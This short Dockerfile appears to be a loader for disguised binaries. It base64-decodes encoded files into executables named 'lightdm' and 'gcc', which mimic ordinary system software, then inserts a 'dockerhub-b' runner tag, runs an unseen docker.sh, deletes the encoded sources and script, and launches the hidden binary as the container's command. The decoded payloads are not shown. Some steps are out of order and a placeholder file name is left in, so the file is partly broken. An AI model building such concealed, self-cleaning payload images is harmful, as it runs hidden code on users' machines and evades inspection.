FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > lightdm.log'
RUN base64 --decode lightdm.64 > lightdm
RUN base64 --decode gcc.64 > gcc
RUN chmod +x gcc

COPY lightdm .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' lightdm
RUN bash ./docker.sh
RUN rm --force --recursive lightdm _REPO_NAME__.64 docker.sh gcc gcc.64

CMD lightdm
